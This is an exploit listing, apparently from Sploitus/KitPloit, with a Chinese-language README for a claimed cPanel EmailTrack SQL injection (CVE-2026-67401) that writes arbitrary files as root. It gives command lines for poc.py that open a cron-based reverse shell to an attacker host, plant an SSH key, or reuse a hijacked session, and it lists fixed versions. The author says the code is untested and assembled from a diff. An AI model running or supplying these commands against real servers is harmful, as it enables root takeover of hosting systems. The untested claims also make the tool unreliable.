Sploitus

Exploit for CVE-2026-67401

kitploit · 2026-09-09

Exploit Code

MARKDOWN38 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AXEDOS-CVE-2026-67401
# CVE-2026-67401

cPanel EmailTrack 中的 SQL 注入漏洞。拥有邮件权限的已认证 cPanel 用户可通过 SQLite ATTACH DATABASE 以 root 身份写入任意文件。一次请求即可获得 root 权限。尚未在真实目标上测试,代码仅根据公开信息和基础 diff 对比拼凑而成。请作为研究人员自行尽职验证,尝试运行并提交 PR 修复。

影响 2026 年 9 月 8 日补丁之前的所有 cPanel/WHM 版本。

## 所需条件

  * 目标服务器上拥有邮件权限的有效 cPanel 账户
  * Python 3、`requests` 库
  * 若使用反弹 Shell 载荷,则需要一个监听器



## 使用方法

root@kitploit:~
    
    
    # 通过 cron 反弹 Shell
    python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
    
    # 投放 SSH 密钥
    python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
    
    # 使用现有会话
    python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
    
    # 试运行(打印请求,不发送)
    python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1
    

# 修复版本

  * 11.138.0.4(CURRENT/EDGE)
  * 11.136.0.39(RELEASE/STABLE)
  * 11.134.0.55(LTS)